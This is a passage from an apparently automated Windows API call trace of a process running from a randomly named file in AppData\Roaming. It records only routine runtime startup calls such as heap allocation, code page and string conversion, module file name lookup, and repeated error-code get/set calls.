(HeapHandle=0x3010000, Flags=0x0, Size=0x50b) returned 0x3010fd0 [0238.002] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ALLUSERSPROFILE=C:\\ProgramData", cchWideChar=1291, lpMultiByteStr=0x3010fd0, cbMultiByte=1291, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ALLUSERSPROFILE=C:\\ProgramData", lpUsedDefaultChar=0x0) returned 1291 [0238.002] FreeEnvironmentStringsW (penv=0x2f10cd8) returned 1 [0238.002] GetLastError () returned 0xcb [0238.002] SetLastError (dwErrCode=0xcb) [0238.002] GetLastError () returned 0xcb [0238.003] SetLastError (dwErrCode=0xcb) [0238.003] GetLastError () returned 0xcb [0238.003] SetLastError (dwErrCode=0xcb) [0238.003] GetACP () returned 0x4e4 [0238.003] RtlAllocateHeap (HeapHandle=0x3010000, Flags=0x0, Size=0x220) returned 0x30114e8 [0238.003] GetLastError () returned 0xcb [0238.003] SetLastError (dwErrCode=0xcb) [0238.003] IsValidCodePage (CodePage=0x4e4) returned 1 [0238.003] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x19fe7c | out: lpCPInfo=0x19fe7c) returned 1 [0238.003] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x19f948 | out: lpCPInfo=0x19f948) returned 1 [0238.003] GetLastError () returned 0xcb [0238.003] SetLastError (dwErrCode=0xcb) [0238.003] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x19fd5c, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0238.003] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x19fd5c, cbMultiByte=256, lpWideCharStr=0x19f6c8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ覥@Ā") returned 256 [0238.004] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ覥@Ā", cchSrc=256, lpCharType=0x19f95c | out: lpCharType=0x19f95c) returned 1 [0238.004] GetLastError () returned 0xcb [0238.004] SetLastError (dwErrCode=0xcb) [0238.004] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x19fd5c, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0238.004] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x19fd5c, cbMultiByte=256, lpWideCharStr=0x19f698, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0238.004] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 256 [0238.004] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x19f488, cchDest=256 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿЀ") returned 256 [0238.005] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿЀ", cchWideChar=256, lpMultiByteStr=0x19fc5c, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿsåwA\x94þ\x19", lpUsedDefaultChar=0x0) returned 256 [0238.005] GetLastError () returned 0xcb [0238.005] SetLastError (dwErrCode=0xcb) [0238.005] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x19fd5c, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0238.005] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x19fd5c, cbMultiByte=256, lpWideCharStr=0x19f6b8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0238.005] LCMapStringW (in: Locale=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 256 [0238.005] LCMapStringW (in: Locale=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x19f4a8, cchDest=256 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸЀ") returned 256 [0238.005] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸЀ", cchWideChar=256, lpMultiByteStr=0x19fb5c, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x8a\x9b\x8c\x9d\x8e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞ\x9f \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿsåwA\x94þ\x19", lpUsedDefaultChar=0x0) returned 256 [0238.005] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x419a90, nSize=0x104 | out: lpFilename="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\bcatcih" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\bcatcih")) returned 0x2d [0238.005] GetLastError () returned 0x0 [0238.005] SetLastError (dwErrCode=0x0) [0238.005] GetLastError () returned 0x0 [0238.005] SetLastError (dwErrCode=0x0) [0238.006] GetLastError () returned 0x0 [0238.006] SetLastError (dwErrCode=0x0) [0238.006] GetLastError () returned 0x0 [0238.006] SetLastError (dwErrCode=0x0) [0238.006] GetLastError () returned 0x0 [0238.006] SetLastError (dwErrCode=0x0) [0238.006] GetLastError () returned 0x0 [0238.006] SetLastError (dwErrCode=0x0) [0238.006] GetLastError () returned 0x0 [0238.006] SetLastError (dwErrCode=0x0) [0238.006] GetLastError () returned 0x0 [0238.006] SetLastError (dwErrCode=0x0) [0238.006] GetLastError () returned 0x0 [0238.006] SetLastError (dwErrCode=0x0) [0238.006] GetLastError () returned 0x0 [0238.007] SetLastError (dwErrCode=0x0) [0238.007] GetLastError () returned 0x0 [0238.007] SetLastError (dwErrCode=0x0) [0238.007] GetLastError () returned 0x0 [0238.007] SetLastError (dwErrCode=0x0) [0238.007] GetLastError () returned 0x0 [0238.007] SetLastError (dwErrCode=0x0) [0238.007] GetLastError () returned 0x0 [0238.007] SetLastError (dwErrCode=0x0) [0238.007] GetLastError () returned 0x0 [0238.007] SetLastError (dwErrCode=0x0) [0238.007] GetLastError () returned 0x0 [0238.007] SetLastError (dwErrCode=0x0) [0238.007] GetLastError () returned 0x0 [0238.007] SetLastError (dwErrCode=0x0) [0238.007] GetLastError () returned 0x0 [0238.008] SetLastError (dwErrCode=0x0) [0238.008] GetLastError () returned 0x0 [0238.008] SetLastError (dwErrCode=0x0) [0238.008] GetLastError () returned 0x0 [0238.008] SetLastError (dwErrCode=0x0) [0238.008] GetLastError () returned 0x0 [0238.008] SetLastError (dwErrCode=0x0) [0238.008] GetLastError () returned 0x0 [0238.008] SetLastError (dwErrCode=0x0) [0238.008] GetLastError () returned 0x0 [0238.008] SetLastError (dwErrCode=0x0) [0238.008] GetLastError () returned 0x0 [0238.008] SetLastError (dwErrCode=0x0) [0238.008] GetLastError () returned 0x0 [0238.008] SetLastError (dwErrCode=0x0) [0238.008] GetLastError () returned 0x0 [0238.009] SetLastError (dwErrCode=0x0) [0238.009] GetLastError () returned 0x0 [0238.009] SetLastError (dwErrCode=0x0) [0238.009] GetLastError () returned 0x0 [0238.009] SetLastError (dwErrCode=0x0) [0238.009] GetLastError () returned 0x0 [0238.010] SetLastError (dwErrCode=0x0) [0238.010] GetLastError () returned 0x0 [0238.010] SetLastError (dwErrCode=0x0) [0238.010] GetLastError () returned 0x0 [0238.010] SetLastError (dwErrCode=0x0) [0238.010] GetLastError () returned 0x0 [0238.010] SetLastError (dwErrCode=0x0) [0238.010] GetLastError () returned 0x0 [0238.010] SetLastError (dwErrCode=0x0) [0238.010] GetLastError () returned 0x0 [0238.010] SetLastError (dwErrCode=0x0) [0238.010] GetLastError () returned 0x0 [0238.010] SetLastError (dwErrCode=0x0) [0238.010] GetLastError () returned 0x0 [0238.010] SetLastError (dwErrCode=0x0) [0238.010] GetLastError () returned 0x0 [0238.011] SetLastError (dwErrCode=0x0) [0238.011] GetLastError () returned 0x0 [0238.011] SetLastError (dwErrCode=0x0) [0238.011] GetLastError () returned 0x0 [0238.011] SetLastError (dwErrCode=0x0) [0238.011] GetLastError () returned 0x0 [0238.011] SetLastError (dwErrCode=0x0) [0238.011] GetLastError () returned 0x0 [0238.011] SetLastError (dwErrCode=0x0) [0238.011] GetLastError () returned 0x0 [0238.011] SetLastError (dwErrCode=0x0) [0238.011] GetLastError () returned 0x0 [0238.011] SetLastError (dwErrCode=0x0) [0238.011] GetLastError () returned 0x0 [0238.012] SetLastError (dwErrCode=0x0) [0238.012] GetLastError () returned 0x0 [0238.012] SetLastError (dwErrCode=0x0) [0238.012] GetLastError () returned 0x0 [0238.012] SetLastError (dwErrCode=0x0) [0238.012] RtlAllocateHeap (HeapHandle=0x3010000, Flags=0x0, Size=0x36) returned 0x3011710 [0238.012] GetLastError () returned 0x0 [0238.012] SetLastError (dwErrCode=0x0) [0238.012] GetLastError () returned 0x0 [0238.012] SetLastError (dwErrCode=0x0) [0238.012] GetLastError () returned 0x0 [0238.012] SetLastError (dwErrCode=0x0) [0238.012] GetLastError () returned 0x0 [0238.012] SetLastError (dwErrCode=0x0) [0238.012] GetLastError () returned 0x0 [0238.013] SetLastError (dwErrCode=0x0) [0238.013] GetLastError () returned 0x0 [0238.013] SetLastError (dwErrCode=0x0) [0238.013] GetLastError () returned 0x0 [0238.013] SetLastError (dwErrCode=0x0) [0238.013] GetLastError () returned 0x0 [0238.013] SetLastError (dwErrCode=0x0) [0238.013] GetLastError () returned 0x0 [0238.013] SetLastError (dwErrCode=0x0) [0238.013] GetLastError () returned 0x0 [0242.741] SetLastError (dwErrCode=0x0) [0242.741] GetLastError () returned 0x0 [0242.741] SetLastError (dwErrCode=0x0) [0242.741] GetLastError () returned 0x0 [0242.741] SetLastError (dwErrCode=0x0) [0242.741] GetLastError () returned 0x0 [0242.741] SetLastError (dwErrCode=0x0) [0242.741] GetLastError () returned 0x0 [0242.741] SetLastError (dwErrCode=0x0) [0242.741] GetLastError () returned 0x0 [0242.741] SetLastError (dwErrCode=0x0) [0242.741] GetLastError () returned 0x0 [0242.741] SetLastError (dwErrCode=0x0) [0242.741] GetLastError () returned 0x0 [0242.741] SetLastError (dwErrCode=0x0) [0242.742] GetLastError () returned 0x0 [0242.742] SetLastError (dwErrCode=0x0) [0242.742] GetLastError () returned 0x0 [0242.742] SetLastError (dwErrCode=0x0) [0242.742] GetLastError () returned 0x0 [0242.742] SetLastError (dwErrCode=0x0) [0242.742] GetLastError () returned 0x0 [0242.742] SetLastError (dwErrCode=0x0) [0242.742] GetLastError () returned 0x0 [0242.742] SetLastError (dwErrCode=0x0) [0242.742] GetLastError () returned 0x0 [0242.742] SetLastError (dwErrCode=0x0) [0242.742] GetLastError () returned 0x0 [0242.742] SetLastError (dwErrCode=0x0) [0242.742] GetLastError () returned 0x0 [0242.742] SetLastError (dwErrCode=0x0) [0242.743] GetLastError () returned 0x0 [0242.743] SetLastError (dwErrCode=0x0) [0242.743] GetLastError () returned 0x0 [0242.743] SetLastError (dwErrCode=0x0) [0242.743] GetLastError () returned 0x0 [0242.743] SetLastError (dwErrCode=0x0) [0242.743] GetLastError () returned 0x0 [0242.743] SetLastError (dwErrCode=0x0) [0242.743] GetLastError () returned 0x0 [0242.743] SetLastError (dwErrCode=0x0) [0242.743] GetLastError () returned 0x0 [0242.743] SetLastError (dwErrCode=0x0) [0242.743] GetLastError () returned 0x0 [0242.743] SetLastError (dwErrCode=0x0) [0242.743] GetLastError () returned 0x0 [0242.743] SetLastError (dwErrCode=0x0) [0242.743] GetLastError () returned 0x0 [0242.744] SetLastError (dwErrCode=0x0) [0242.744] GetLastError () returned 0x0 [0242.744] SetLastError (dwErrCode=0x0) [0242.744] GetLastError () returned 0x0 [0242.744] SetLastError (dwErrCode=0x0) [0242.744] GetLastError () returned 0x0 [0242.744] SetLastError (dwErrCode=0x0) [0242.744] GetLastError () returned 0x0 [0242.744] SetLastError (dwErrCode=0x0) [0242.744] GetLastError () returned 0x0 [0242.744] SetLastError (dwErrCode=0x0) [0242.744] GetLastError () returned 0x0 [0242.744] SetLastError (dwErrCode=0x0) [0242.744] GetLastError () returned 0x0 [0242.744] SetLastError (dwErrCode=0x0) [0242.745] GetLastError () returned 0x0 [0242.745] SetLastError (dwErrCode=0x0) [0242.745] GetLastError () returned 0x0 [0242.745] SetLastError (dwErrCode=0x0) [0242.745] GetLastError () returned 0x0 [0242.745] SetLastError (dwErrCode=0x0) [0242.745] GetLastError () returned 0x0 [0242.745] SetLastError (dwErrCode=0x0) [0242.745] GetLastError () returned 0x0 [0242.745] SetLastError (dwErrCode=0x0) [0242.745] RtlAllocateHeap (HeapHandle=0x3010000, Flags=0x8, Size=0x90) returned 0x3011750 [0242.745] RtlAllocateHeap (HeapHandle=0x3010000, Flags=0x8, Size=0x1f) returned 0x30117e8 [0242.745] RtlAllocateHeap (HeapHandle=0x3010000, Flags=0x8, Size=0x2e) returned 0x3011810 [0242.745] RtlAllocateHeap (HeapHandle=0x3010000, Flags=0x8, Size=0x37) returned 0x3011848 [0242.745] RtlAllocateHeap (HeapHandle=0x3010000, Flags=0x8, Size=0x3c) returned 0x3011888 [0242.745] RtlAllocateHeap (HeapHandle=0x3010000, Flags=0x8, Size=0x31) returned 0x30118d0 [0242.745] RtlAllocateHeap (HeapHandle=0x3010000, Flags=0x8, Size=0x14) returned 0x3011910 [0242.746] RtlAllocateHeap (HeapHandle=0x3010000, Flags=0x8, Size=0x24) returned 0x3011930 [0242.746] RtlAllocateHeap (HeapHandle=0x3010000, Flags=0x8, Size=0xd) returned 0x3011960 [0242.746] RtlAllocateHeap (HeapHandle=0x3010000, Flags=0x8, Size=0x1d) returned 0x3011978 [0242.746] RtlAllocateHeap (HeapHandle=0x3010000, Flags=0x8, Size=0x31) returned 0x30119a0 [0242.746] RtlAllocateHeap (HeapHandle=0x3010000, Flags=0x8, Size=0x15) returned 0x30119e0 [0242.746] RtlAllocateHeap (HeapHandle=0x3010000, Flags=0x8, Size=0x17) returned 0x3011a00 [0242.746] RtlAllocateHeap (HeapHandle=0x3010000, Flags=0x8, Size=0xe) returned 0x3011a20 [0242.746] RtlAllocateHeap (HeapHandle=0x3010000, Flags=0x8, Size=0x69) returned 0x3011a38 [0242.746] RtlAllocateHeap (HeapHandle=0x3010000, Flags=0x8, Size=0x3e) returned 0x3011ab0 [0242.746] RtlAllocateHeap (HeapHandle=0x3010000, Flags=0x8, Size=0x1b) returned 0x3011af8 [0242.746] RtlAllocateHeap (HeapHandle=0x3010000, Flags=0x8, Size=0x1d) returned 0x3011b20 [0242.746] RtlAllocateHeap (HeapHandle=0x3010000, Flags=0x8, Size=0x48) returned 0x3011b48 [0242.746] RtlAllocateHeap (HeapHandle=0x3010000, Flags=0x8, Size=0x12) returned 0x3011b98 [0242.746] RtlAllocateHeap (HeapHandle=0x3010000, Flags=0x8, Size=0x18) returned 0x3011bb8 [0242.746] RtlAllocateHeap (HeapHandle=0x3010000, Flags=0x8, Size=0x1b) returned 0x3011bd8 [0242.746] RtlAllocateHeap (HeapHandle=0x3010000, Flags=0x8, Size=0x24) returned 0x3011c00 [0242.746] RtlAllocateHeap (HeapHandle=0x3010000, Flags=0x8, Size=0x29) returned 0x3011c30 [0242.746] RtlAllocateHeap (HeapHandle=0x3010000, Flags=0x8, Size=0x1e) returned 0x3011c68 [0242.746] RtlAllocateHeap (HeapHandle=0x3010000, Flags=0x8, Size=0x69) returned 0x3011c90 [0242.746] RtlAllocateHeap (HeapHandle=0x3010000, Flags=0x8, Size=0x17) returned 0x3011d08 [0242.746] RtlAllocateHeap (HeapHandle=0x3010000, Flags=0x8, Size=0xf) returned 0x3011d28 [0242.746] RtlAllocateHeap (HeapHandle=0x3010000, Flags=0x8, Size=0x16) returned 0x3011d40 [0242.746] RtlAllocateHeap (HeapHandle=0x3010000, Flags=0x8, Size=0x2a) returned 0x3011d60 [0242.746] RtlAllocateHeap (HeapHandle=0x3010000, Flags=0x8, Size=0x29) returned 0x3011d98 [0242.746] RtlAllocateHeap 